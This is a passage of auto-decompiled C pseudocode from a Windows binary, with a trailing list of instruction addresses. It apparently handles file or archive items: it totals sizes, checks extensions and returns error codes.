																										 *(_t1785 - 4) = 0x1a;
																										E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																									}
																									_push(_t1785 - 0x1fc);
																									_push(_t1785 - 0x178);
																									E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																								}
																							}
																						}
																						 *(_t1785 - 4) = 0xf;
																						E00407A18( *((intOrPtr*)(_t1785 - 0x168)));
																						_t1775 = _t1775 + 1;
																						__eflags =  *(_t1785 + 0x14) -  *(_t1785 - 0x38);
																					} while ( *(_t1785 + 0x14) <  *(_t1785 - 0x38));
																					goto L167;
																				} else {
																					goto L152;
																				}
																				do {
																					L152:
																					_t1730 =  *( *((intOrPtr*)(_t1627 + 0xc)) + _t1298 * 8);
																					 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																					asm("adc [edi+0x2c], ecx");
																					_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																					_t1298 = _t1298 + 1;
																					__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				} while (_t1298 <  *((intOrPtr*)(_t1627 + 8)));
																				 *(_t1785 + 0x14) = _t1298;
																				goto L154;
																			}
																		}
																		_t1340 = _t1232 << 2;
																		 *(_t1785 + 0x14) = _t1340;
																		while(1) {
																			 *(_t1785 - 0x5c) =  *(_t1785 - 0x5c) & 0x00000000;
																			_t1651 =  *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1340));
																			__eflags =  *((char*)(_t1651 + 0x1c));
																			if( *((char*)(_t1651 + 0x1c)) != 0) {
																				 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																				_t1343 =  *(_t1340 +  *((intOrPtr*)(_t1785 - 0xc8)));
																				__eflags = _t1343;
																				if(_t1343 >= 0) {
																					_t1344 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1343 * 4));
																					__eflags =  *((char*)(_t1344 + 0x38));
																					if( *((char*)(_t1344 + 0x38)) == 0) {
																						 *(_t1785 - 0x5c) = 1;
																					}
																				}
																			}
																			E0043AC2F(_t1785 - 0xe8,  *(_t1785 - 0x5c));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 4;
																			__eflags =  *(_t1785 - 0x20) -  *(_t1785 - 0x18);
																			if( *(_t1785 - 0x20) >=  *(_t1785 - 0x18)) {
																				goto L146;
																			}
																			_t1340 =  *(_t1785 + 0x14);
																		}
																		goto L146;
																	}
																	_t1345 = E00429872(_t1445, _t1215);
																	_t1657 =  *((intOrPtr*)(_t1445 + 0x17c));
																	 *((intOrPtr*)(_t1785 - 0x104)) = _t1345;
																	_push(_t1746);
																	_push(_t1733);
																	_push(_t1345);
																	 *((intOrPtr*)(_t1785 - 0x100)) = _t1733;
																	_t1347 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	asm("adc eax, [ebx+0x14c]");
																	_push( *((intOrPtr*)(_t1657 + 4 + _t1347 * 8)));
																	_push( *((intOrPtr*)(_t1657 + _t1347 * 8)) +  *((intOrPtr*)(_t1445 + 0x148)));
																	_t1730 =  *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50);
																	_t1350 = E00432A5E( *((intOrPtr*)(_t1785 - 0x98)), _t1730);
																	__eflags = _t1350;
																	 *(_t1785 + 0x14) = _t1350;
																	if(_t1350 != 0) {
																		 *(_t1785 - 4) = 0xe;
																		E00428A47(_t1785 - 0x4cc);
																		 *(_t1785 - 4) = 5;
																		E00428510(_t1785 - 0x1b4, __eflags);
																		 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																		 *(_t1785 - 4) = 0x10;
																		E0040862D();
																		 *(_t1785 - 4) = 4;
																		E00408604(_t1785 - 0x4c);
																		 *(_t1785 - 4) = 3;
																		E0043353F(_t1785 - 0x2cc, __eflags);
																		__eflags = _t1746;
																		 *(_t1785 - 4) = 1;
																		if(_t1746 != 0) {
																			 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																		}
																		 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																		E00408604(_t1785 - 0xb4);
																		 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																		E00408604(_t1785 - 0xd4);
																		_t1076 =  *(_t1785 + 0x14);
																		goto L286;
																	}
																	 *((intOrPtr*)(_t1746 + 0x18)) =  *((intOrPtr*)(_t1746 + 0x18)) +  *((intOrPtr*)(_t1785 - 0x104));
																	asm("adc [edi+0x1c], eax");
																	 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																	_t1363 =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																	_t1667 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	 *(_t1785 - 0x18) = _t1363;
																	__eflags =  *(_t1363 + 0x30);
																	if( *(_t1363 + 0x30) <= 0) {
																		L136:
																		_t1364 =  *((intOrPtr*)(_t1785 + 0x10));
																		_push( *(_t1785 - 0x18));
																		_t366 = _t1364 + 0x3c; // 0x3c
																		E0042F063(_t366);
																		goto L159;
																	}
																	_t1367 = _t1667 << 3;
																	__eflags = _t1367;
																	 *(_t1785 + 0x14) = _t1367;
																	do {
																		E0042389F( *((intOrPtr*)(_t1785 + 0x10)),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)))),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)) + 4)));
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																		_t1371 =  *(_t1785 - 0x18);
																		 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 8;
																		__eflags =  *(_t1785 - 0x20) -  *((intOrPtr*)(_t1371 + 0x30));
																	} while ( *(_t1785 - 0x20) <  *((intOrPtr*)(_t1371 + 0x30)));
																	goto L136;
																}
																goto L168;
															}
															L225:
															 *(_t1785 - 4) = 0xe;
															E00428A47(_t1785 - 0x4cc);
															 *(_t1785 - 4) = 5;
															E00428510(_t1785 - 0x1b4, __eflags);
															 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
															__eflags =  *(_t1785 - 0x2c) - 4;
														} while ( *(_t1785 - 0x2c) < 4);
														__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
														if( *(_t1785 - 0x24) ==  *(_t1785 - 0xac)) {
															 *(_t1785 - 0x7c) = 4;
															 *((intOrPtr*)(_t1785 - 0x88)) = 0;
															 *(_t1785 - 0x84) = 0;
															 *((intOrPtr*)(_t1785 - 0x80)) = 0;
															 *((intOrPtr*)(_t1785 - 0x8c)) = 0x47a668;
															_t1764 =  *((intOrPtr*)(_t1785 + 8));
															 *(_t1785 - 4) = 0x27;
															 *(_t1785 - 0x10) = 0;
															__eflags =  *(_t1764 + 8);
															if( *(_t1764 + 8) <= 0) {
																L277:
																E00419600(_t1785 - 0x8c, _t1730, E00432D40, _t1764);
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																__eflags =  *(_t1785 - 0x84);
																if( *(_t1785 - 0x84) <= 0) {
																	L282:
																	 *(_t1785 - 4) = 5;
																	E00408604(_t1785 - 0x8c);
																	E004329D2( *((intOrPtr*)(_t1785 + 0x10)));
																	 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																	 *(_t1785 - 4) = 0x29;
																	E0040862D();
																	 *(_t1785 - 4) = 4;
																	E00408604(_t1785 - 0x4c);
																	 *(_t1785 - 4) = 3;
																	E0043353F(_t1785 - 0x2cc, __eflags);
																	__eflags = _t1746;
																	 *(_t1785 - 4) = 1;
																	if(_t1746 != 0) {
																		 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																	}
																	_t1765 = 0;
																	__eflags = 0;
																	goto L285;
																} else {
																	goto L278;
																}
																do {
																	L278:
																	_t1767 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0x80)) +  *(_t1785 - 0x10) * 4) * 4));
																	E0042EAC2(_t1785 - 0x158);
																	__eflags =  *((char*)(_t1767 + 0x39));
																	 *(_t1785 - 4) = 0x28;
																	_push(_t1785 - 0x1fc);
																	if( *((char*)(_t1767 + 0x39)) == 0) {
																		_push(_t1785 - 0x158);
																		_push( *_t1767);
																		E004308F5(_t1445);
																	} else {
																		E0043327A(_t1767, _t1785 - 0x158);
																	}
																	_push(_t1785 - 0x1fc);
																	_push(_t1785 - 0x158);
																	E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																	 *(_t1785 - 4) = 0x27;
																	E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																	__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x84);
																} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x84));
																goto L282;
															} else {
																goto L268;
															}
															do {
																L268:
																_t1092 =  *( *((intOrPtr*)(_t1764 + 0xc)) +  *(_t1785 - 0x10) * 4);
																__eflags = _t1092[0xe];
																if(_t1092[0xe] == 0) {
																	_t1093 =  *_t1092;
																	__eflags = _t1093 - 0xffffffff;
																	if(_t1093 == 0xffffffff) {
																		L275:
																		E00415C6D(_t1785 - 0x8c,  *(_t1785 - 0x10));
																		goto L276;
																	}
																	__eflags =  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1093 * 4)) + 0x1c));
																	L274:
																	if(__eflags != 0) {
																		goto L276;
																	}
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(_t1092[0xe] != 0) {
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(__eflags != 0) {
																	goto L275;
																}
																goto L274;
																L276:
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																__eflags =  *(_t1785 - 0x10) -  *(_t1764 + 8);
															} while ( *(_t1785 - 0x10) <  *(_t1764 + 8));
															goto L277;
														}
														 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
														 *(_t1785 - 4) = 0x26;
														E0040862D();
														 *(_t1785 - 4) = 4;
														E00408604(_t1785 - 0x4c);
														 *(_t1785 - 4) = 3;
														E0043353F(_t1785 - 0x2cc, __eflags);
														__eflags = _t1746;
														 *(_t1785 - 4) = 1;
														if(_t1746 != 0) {
															 *((intOrPtr*)( *_t1746 + 8))(_t1746);
														}
														_t1765 = 0x80004005;
														goto L285;
													}
													 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
													 *(_t1785 - 4) = 0xd;
													E0040862D();
													 *(_t1785 - 4) = 4;
													E00408604(_t1785 - 0x4c);
													 *(_t1785 - 4) = 3;
													E0043353F(_t1785 - 0x2cc, __eflags);
													__eflags = _t1746;
													 *(_t1785 - 4) = 1;
													if(_t1746 != 0) {
														 *((intOrPtr*)( *_t1746 + 8))(_t1746);
													}
													_t1765 =  *(_t1785 + 0x14);
													goto L285;
												}
												 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
												 *(_t1785 - 4) = 0xc;
												E0040862D();
												 *(_t1785 - 4) = 4;
												E00408604(_t1785 - 0x4c);
												 *(_t1785 - 4) = 3;
												E0043353F(_t1785 - 0x2cc, __eflags);
												__eflags = _t1746;
												 *(_t1785 - 4) = 1;
												if(_t1746 != 0) {
													 *((intOrPtr*)( *_t1746 + 8))(_t1746);
												}
												_t1765 =  *(_t1785 + 0x14);
												goto L285;
											}
											_push(0x14);
											_t1776 = E004079F2();
											 *(_t1785 - 0x5c) = _t1776;
											__eflags = _t1776;
											 *(_t1785 - 4) = 8;
											if(_t1776 == 0) {
												_t1776 = 0;
												__eflags = 0;
											} else {
												 *_t1776 = 0x47a78c;
												 *(_t1776 + 4) =  *(_t1776 + 4) & 0x00000000;
												_t221 = _t1776 + 8; // 0x8
												E0040351A(_t221);
												 *_t1776 = 0x47b404;
											}
											 *(_t1785 - 4) = 5;
											 *(_t1785 - 0xa0) = _t1776;
											E0040C9B4(_t1785 - 0x294, _t1776);
											_t1391 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c))));
											__eflags =  *((char*)(_t1391 + 0x2c));
											if( *((char*)(_t1391 + 0x2c)) == 0) {
												_t1392 =  *(_t1785 + 0x20);
												__eflags = _t1392;
												if(_t1392 != 0) {
													 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & 0x00000000;
													_t1730 = _t1785 + 0x20;
													 *(_t1785 - 4) = 0xa;
													_t1393 =  *((intOrPtr*)( *_t1392 + 0xc))(_t1392, _t1730);
													__eflags = _t1393;
													_push( *(_t1785 + 0x20));
													 *(_t1785 - 0x5c) = _t1393;
													if(_t1393 == 0) {
														_t255 = _t1776 + 8; // 0x8
														E00403593(_t255);
														 *(_t1785 - 4) = 5;
														__imp__#6( *(_t1785 + 0x20));
														goto L109;
													}
													__imp__#6();
													 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
													 *(_t1785 - 4) = 0xb;
													E0040862D();
													 *(_t1785 - 4) = 4;
													E00408604(_t1785 - 0x4c);
													 *(_t1785 - 4) = 3;
													E0043353F(_t1785 - 0x2cc, __eflags);
													__eflags = _t1746;
													 *(_t1785 - 4) = 1;
													if(_t1746 != 0) {
														 *((intOrPtr*)( *_t1746 + 8))(_t1746);
													}
													_t1765 =  *(_t1785 - 0x5c);
													goto L285;
												}
												 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
												 *(_t1785 - 4) = 9;
												E0040862D();
												 *(_t1785 - 4) = 4;
												E00408604(_t1785 - 0x4c);
												 *(_t1785 - 4) = 3;
												E0043353F(_t1785 - 0x2cc, __eflags);
												__eflags = _t1746;
												 *(_t1785 - 4) = 1;
												if(_t1746 != 0) {
													 *((intOrPtr*)( *_t1746 + 8))(_t1746);
												}
												_t1765 = 0x80004001;
												goto L285;
											} else {
												_t227 = _t1776 + 8; // 0x8
												E00401E26(_t227, _t1391 + 0x30);
												goto L109;
											}
										} else {
											goto L78;
										}
										do {
											L78:
											_t1730 =  *(_t1785 - 0x10);
											_t1409 =  *((intOrPtr*)( *((intOrPtr*)(_t1459 + 0xc)) + _t1730 * 4));
											__eflags =  *((char*)(_t1409 + 0x38));
											if( *((char*)(_t1409 + 0x38)) == 0) {
												goto L93;
											}
											__eflags =  *((char*)(_t1409 + 0x3b));
											if( *((char*)(_t1409 + 0x3b)) != 0) {
												goto L93;
											}
											__eflags =  *((char*)(_t1409 + 0x3a));
											if( *((char*)(_t1409 + 0x3a)) != 0) {
												goto L93;
											}
											_t1730 =  *(_t1409 + 0x20) |  *(_t1409 + 0x24);
											__eflags = _t1730;
											if(_t1730 == 0) {
												goto L93;
											}
											 *(_t1785 - 0x25) =  *(_t1785 - 0x25) & 0x00000000;
											__eflags =  *(_t1785 - 0x11);
											if( *(_t1785 - 0x11) == 0) {
												L92:
												_t1730 =  *(_t1785 - 0x25) & 0x000000ff;
												E00415C6D( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) + E0043352C( *((intOrPtr*)(_t1760 + 0x2c)), _t1730) * 4)),  *(_t1785 - 0x10));
												_t1459 =  *((intOrPtr*)(_t1785 + 8));
												goto L93;
											}
											_t1694 = _t1409 + 0x28;
											_t1414 =  *(_t1409 + 0x2c);
											__eflags = _t1414;
											if(_t1414 == 0) {
												goto L92;
											}
											_t1738 =  *_t1694;
											_t1415 = _t1738 + _t1414 * 2 - 2;
											while(1) {
												__eflags =  *_t1415 - 0x2e;
												if( *_t1415 == 0x2e) {
													break;
												}
												__eflags = _t1415 - _t1738;
												if(_t1415 == _t1738) {
													_t1417 = _t1415 | 0xffffffff;
													__eflags = _t1417;
													L90:
													__eflags = _t1417;
													if(_t1417 >= 0) {
														__eflags = _t1417 + 1;
														_t1420 = E004072C9(_t1694, _t1785 - 0x84, _t1417 + 1);
														 *(_t1785 - 4) = 7;
														 *(_t1785 - 0x25) = E00432FD7(_t1420);
														 *(_t1785 - 4) = 5;
														E00407A18( *(_t1785 - 0x84));
													}
													goto L92;
												}
												_t1415 = _t1415;
											}
											_t1417 = _t1415 - _t1738 >> 1;
											goto L90;
											L93:
											 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
											__eflags =  *(_t1785 - 0x10) -  *(_t1459 + 8);
										} while ( *(_t1785 - 0x10) <  *(_t1459 + 8));
										goto L94;
									}
									__eflags =  *(_t1760 + 0x1c);
									if( *(_t1760 + 0x1c) == 0) {
										goto L77;
									}
									goto L76;
								} else {
									_t1765 = E0040FB53(_t1785 - 0x2cc);
									__eflags = _t1765;
									if(__eflags != 0) {
										L255:
										 *(_t1785 - 4) = 3;
										E0043353F(_t1785 - 0x2cc, __eflags);
										__eflags = _t1746;
										 *(_t1785 - 4) = 1;
										if(_t1746 != 0) {
											 *((intOrPtr*)( *_t1746 + 8))(_t1746);
										}
										goto L285;
									}
									goto L72;
								}
							} else {
								_t1765 = _t1040;
								L285:
								 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
								E00408604(_t1785 - 0xb4);
								 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
								E00408604(_t1785 - 0xd4);
								_t1076 = _t1765;
								L286:
								 *[fs:0x0] =  *((intOrPtr*)(_t1785 - 0xc));
								return _t1076;
							}
						}
						_t1777 =  *((intOrPtr*)(_t1757 + 0xc));
						do {
							_t1428 =  *_t1777;
							if( *((char*)(_t1428 + 0x38)) == 0) {
								goto L54;
							}
							_t1701 =  *(_t1428 + 0x20);
							_t1429 =  *(_t1428 + 0x24);
							 *(_t1785 - 0x54) =  *(_t1785 - 0x54) + _t1701;
							asm("adc [ebp-0x50], eax");
							if( *(_t1785 - 0x70) != 1 ||  *(_t1785 - 0x6c) != 0) {
								 *(_t1785 - 0x34) =  *(_t1785 - 0x34) + _t1701;
								asm("adc [ebp-0x30], eax");
								goto L53;
							} else {
								__eflags = _t1429 -  *(_t1785 - 0x30);
								if(__eflags < 0) {
									L53:
									_t1745 = 0;
									goto L54;
								}
								if(__eflags > 0) {
									L52:
									 *(_t1785 - 0x34) = _t1701;
									 *(_t1785 - 0x30) = _t1429;
									goto L53;
								}
								__eflags = _t1701 -  *(_t1785 - 0x34);
								if(_t1701 <=  *(_t1785 - 0x34)) {
									goto L53;
								}
								goto L52;
							}
							L54:
							 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
							_t1777 = _t1777 + 4;
						} while ( *(_t1785 - 0x10) < _t1730);
						goto L55;
					}
					E0040867E(_t1785 - 0xd4,  *((intOrPtr*)(_t1445 + 0x6c)));
					_t1751 = 0;
					if( *((intOrPtr*)(_t1445 + 0x6c)) <= 0) {
						L12:
						_t1739 = 0;
						_t1431 = 0;
						if( *(_t1757 + 8) <= 0) {
							L16:
							 *(_t1785 - 0x1c) = _t1739;
							if( *((intOrPtr*)(_t1445 + 0x44)) <= _t1739) {
								L42:
								E00433628(_t1785 - 0xb4, _t1739, E00432B98, _t1445);
								_t1757 =  *((intOrPtr*)(_t1785 + 8));
								_t1745 = 0;
								goto L43;
							} else {
								goto L17;
							}
							do {
								L17:
								_t1434 =  *(_t1785 - 0x1c) << 2;
								_t1739 =  *(_t1434 +  *((intOrPtr*)(_t1445 + 0x5c)));
								 *(_t1785 - 0x2c) = 0;
								_t1706 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1434);
								 *(_t1785 - 0x24) = 0;
								 *(_t1785 - 0x18) = _t1739;
								 *(_t1785 - 0x60) = 0;
								 *(_t1785 - 0x5c) = 0;
								if(_t1739 > 0) {
									_t1779 =  *((intOrPtr*)(_t1785 - 0xc8));
									_t1740 = _t1779 + _t1706 * 4;
									_t1708 =  *((intOrPtr*)(_t1445 + 0x70)) - _t1779;
									 *(_t1785 - 0x68) = _t1708;
									goto L20;
									L24:
									_t1740 =  &(_t1740[1]);
									if( *(_t1785 - 0x2c) <  *(_t1785 - 0x18)) {
										_t1708 =  *(_t1785 - 0x68);
										L20:
										_t1709 =  *((intOrPtr*)(_t1740 + _t1708));
										if( *((char*)(_t1709 + 0x1c)) != 0) {
											_t1780 =  *_t1740;
											 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
											if(_t1780 >= 0 &&  *((char*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1780 * 4)) + 0x38)) == 0) {
												 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
												 *(_t1785 - 0x60) =  *(_t1785 - 0x60) +  *_t1709;
												asm("adc [ebp-0x5c], ecx");
											}
										}
										goto L24;
									}
									if( *(_t1785 - 0x24) == 0) {
										goto L41;
									}
									 *(_t1785 - 0x84) =  *(_t1785 - 0x1c);
									 *(_t1785 - 0x7c) =  *(_t1785 - 0x24);
									_t1436 =  *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x48)) + _t1434));
									_t1715 =  *((intOrPtr*)(_t1436 + 8)) - 1;
									if(_t1715 < 0) {
										L31:
										 *(_t1785 - 0x11) =  *(_t1785 - 0x11) & 0x00000000;
										goto L32;
									} else {
										_t1782 =  *((intOrPtr*)(_t1436 + 0xc)) + _t1715 * 4;
										while(1) {
											_t1742 =  *_t1782;
											if( *_t1742 == 0x6f10701 &&  *((intOrPtr*)(_t1742 + 4)) == 0) {
												break;
											}
											_t1715 = _t1715 - 1;
											_t1782 = _t1782 - 4;
											if(_t1715 >= 0) {
												continue;
											}
											goto L31;
										}
										 *(_t1785 - 0x11) = 1;
										L32:
										_t1739 = E004334B1(_t1436) & 0x000000ff;
										_t1438 = E0043352C( *(_t1785 - 0x11), E004334B1(_t1436) & 0x000000ff);
										_t1788 = _t1788 - 0xc;
										 *((intOrPtr*)(_t1785 - 0x80)) = _t1438;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										E0041CA36(_t1785 - 0xb4);
										if( *(_t1785 - 0x24) !=  *(_t1785 - 0x18)) {
											_t1719 =  *(_t1785 - 0x60);
											_t1441 =  *(_t1785 - 0x5c);
											 *(_t1785 - 0x54) =  *(_t1785 - 0x54) + _t1719;
											asm("adc [ebp-0x50], eax");
											__eflags = _t1441 -  *(_t1785 - 0x74);
											if(__eflags < 0) {
												L39:
												__eflags =  *(_t1785 - 0x11);
												if( *(_t1785 - 0x11) != 0) {
													 *(_t1785 - 0x26) = 1;
												}
												goto L41;
											}
											if(__eflags > 0) {
												L38:
												 *(_t1785 - 0x78) = _t1719;
												 *(_t1785 - 0x74) = _t1441;
												goto L39;
											}
											__eflags = _t1719 -  *(_t1785 - 0x78);
											if(_t1719 <=  *(_t1785 - 0x78)) {
												goto L39;
											}
											goto L38;
										}
										 *(_t1785 - 0x54) =  *(_t1785 - 0x54) + E00429872(_t1445,  *(_t1785 - 0x1c));
										asm("adc [ebp-0x50], edx");
										goto L41;
									}
								}
								L41:
								 *(_t1785 - 0x1c) =  *(_t1785 - 0x1c) + 1;
							} while ( *(_t1785 - 0x1c) <  *((intOrPtr*)(_t1445 + 0x44)));
							goto L42;
						} else {
							goto L13;
						}
						do {
							L13:
							_t1724 =  *( *( *((intOrPtr*)(_t1757 + 0xc)) + _t1431 * 4));
							if(_t1724 != 0xffffffff) {
								 *( *((intOrPtr*)(_t1785 - 0xc8)) + _t1724 * 4) = _t1431;
							}
							_t1431 = _t1431 + 1;
						} while (_t1431 <  *(_t1757 + 8));
						goto L16;
					} else {
						goto L11;
					}
					do {
						L11:
						E00415C6D(_t1785 - 0xd4, 0xffffffff);
						_t1751 = _t1751 + 1;
					} while (_t1751 <  *((intOrPtr*)(_t1445 + 0x6c)));
					goto L12;
				}
			}











































































































































                                                                      0x00431203
                                                                      0x00431208
                                                                      0x0043120e
                                                                      0x00431215
                                                                      0x00431218
                                                                      0x0043121c
                                                                      0x0043121f
                                                                      0x00431222
                                                                      0x00431229
                                                                      0x0043122c
                                                                      0x0043122d
                                                                      0x0043122f
                                                                      0x00431236
                                                                      0x00431236
                                                                      0x0043123b
                                                                      0x0043124b
                                                                      0x0043124d
                                                                      0x0043124d
                                                                      0x0043123d
                                                                      0x0043123d
                                                                      0x00431243
                                                                      0x00431243
                                                                      0x00431251
                                                                      0x0043125b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431263
                                                                      0x00431264
                                                                      0x00431265
                                                                      0x00431269
                                                                      0x0043126a
                                                                      0x0043126b
                                                                      0x00431272
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431278
                                                                      0x00431278
                                                                      0x00431280
                                                                      0x00431285
                                                                      0x00431297
                                                                      0x0043129a
                                                                      0x0043129f
                                                                      0x004312a9
                                                                      0x004312ad
                                                                      0x004312b2
                                                                      0x004312b6
                                                                      0x004312b9
                                                                      0x004312bc
                                                                      0x004312bf
                                                                      0x004312c2
                                                                      0x00431483
                                                                      0x00431483
                                                                      0x00431486
                                                                      0x0043148b
                                                                      0x0043148e
                                                                      0x00431491
                                                                      0x004314dd
                                                                      0x004314dd
                                                                      0x004314e0
                                                                      0x004314e3
                                                                      0x004314f2
                                                                      0x004314f5
                                                                      0x004314f5
                                                                      0x004314f8
                                                                      0x00431500
                                                                      0x00431509
                                                                      0x0043150c
                                                                      0x0043150c
                                                                      0x00431512
                                                                      0x0043151b
                                                                      0x00431520
                                                                      0x00431529
                                                                      0x0043152b
                                                                      0x00431531
                                                                      0x00431534
                                                                      0x00431536
                                                                      0x0043153a
                                                                      0x00431547
                                                                      0x00431547
                                                                      0x0043153c
                                                                      0x00431543
                                                                      0x00431543
                                                                      0x00431549
                                                                      0x0043154b
                                                                      0x0043154e
                                                                      0x00431552
                                                                      0x00431555
                                                                      0x0043155a
                                                                      0x0043155a
                                                                      0x0043155d
                                                                      0x00431562
                                                                      0x00431566
                                                                      0x00431571
                                                                      0x00431576
                                                                      0x0043157d
                                                                      0x00431581
                                                                      0x00431598
                                                                      0x0043159b
                                                                      0x004315a0
                                                                      0x004315a9
                                                                      0x004315ad
                                                                      0x004315ae
                                                                      0x004315b4
                                                                      0x004315c2
                                                                      0x004315c3
                                                                      0x004315c7
                                                                      0x004315d2
                                                                      0x004315d6
                                                                      0x004315db
                                                                      0x004315db
                                                                      0x004315db
                                                                      0x004315de
                                                                      0x004315e1
                                                                      0x004315e6
                                                                      0x004315e9
                                                                      0x004315ed
                                                                      0x004315f5
                                                                      0x004315f5
                                                                      0x004315f5
                                                                      0x004315f5
                                                                      0x004315f9
                                                                      0x004315f9
                                                                      0x004315fc
                                                                      0x00431600
                                                                      0x00431604
                                                                      0x004316cc
                                                                      0x004316cc
                                                                      0x004316d3
                                                                      0x004316d7
                                                                      0x00431808
                                                                      0x0043180d
                                                                      0x00431811
                                                                      0x00431816
                                                                      0x00431818
                                                                      0x0043181b
                                                                      0x00431864
                                                                      0x00431869
                                                                      0x0043186b
                                                                      0x0043186e
                                                                      0x004318b4
                                                                      0x004318b7
                                                                      0x004318ba
                                                                      0x004318bd
                                                                      0x004318c0
                                                                      0x004318c3
                                                                      0x004318cf
                                                                      0x004318d2
                                                                      0x004318d9
                                                                      0x004318e2
                                                                      0x004318e4
                                                                      0x00431907
                                                                      0x004318e6
                                                                      0x004318ec
                                                                      0x004318f0
                                                                      0x004318f5
                                                                      0x004318f5
                                                                      0x0043190e
                                                                      0x00431913
                                                                      0x00431915
                                                                      0x00431942
                                                                      0x00431948
                                                                      0x0043194f
                                                                      0x00431956
                                                                      0x00431956
                                                                      0x00431917
                                                                      0x00431917
                                                                      0x0043191e
                                                                      0x00431920
                                                                      0x00431926
                                                                      0x00431928
                                                                      0x0043192a
                                                                      0x00431934
                                                                      0x00431934
                                                                      0x00431939
                                                                      0x00431939
                                                                      0x0043191e
                                                                      0x00431966
                                                                      0x00431967
                                                                      0x0043196c
                                                                      0x0043196f
                                                                      0x00431973
                                                                      0x00431979
                                                                      0x00431e51
                                                                      0x00431e54
                                                                      0x00431e57
                                                                      0x00431e59
                                                                      0x00431e5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431e6a
                                                                      0x00431e6f
                                                                      0x00431e80
                                                                      0x00431e84
                                                                      0x00431e89
                                                                      0x00431e8d
                                                                      0x00431e95
                                                                      0x00431e95
                                                                      0x00431ea5
                                                                      0x00431ea5
                                                                      0x00431ea9
                                                                      0x00431eab
                                                                      0x00431efd
                                                                      0x00431f0f
                                                                      0x00431f1c
                                                                      0x00431f21
                                                                      0x00431f32
                                                                      0x00431f36
                                                                      0x00431f3b
                                                                      0x00431f3d
                                                                      0x00431f67
                                                                      0x00431f67
                                                                      0x00431f6b
                                                                      0x00431f6d
                                                                      0x004322d9
                                                                      0x004322df
                                                                      0x004322e3
                                                                      0x004322ee
                                                                      0x004322f2
                                                                      0x00000000
                                                                      0x004322f2
                                                                      0x00431f78
                                                                      0x00431f82
                                                                      0x00431f88
                                                                      0x00431f8e
                                                                      0x00431f94
                                                                      0x00431f9a
                                                                      0x00431fa0
                                                                      0x00431fa5
                                                                      0x00431fa9
                                                                      0x00431fac
                                                                      0x00431fb0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431fb6
                                                                      0x00431fb6
                                                                      0x00431fb6
                                                                      0x00431fb9
                                                                      0x00431fbb
                                                                      0x00431fbc
                                                                      0x00431fbf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431fc5
                                                                      0x00431fd0
                                                                      0x00431fe4
                                                                      0x00431fed
                                                                      0x00431ff3
                                                                      0x00431ff6
                                                                      0x00431ffc
                                                                      0x00432002
                                                                      0x00432005
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043200b
                                                                      0x00432018
                                                                      0x00432018
                                                                      0x0043201c
                                                                      0x0043206d
                                                                      0x0043206d
                                                                      0x00432078
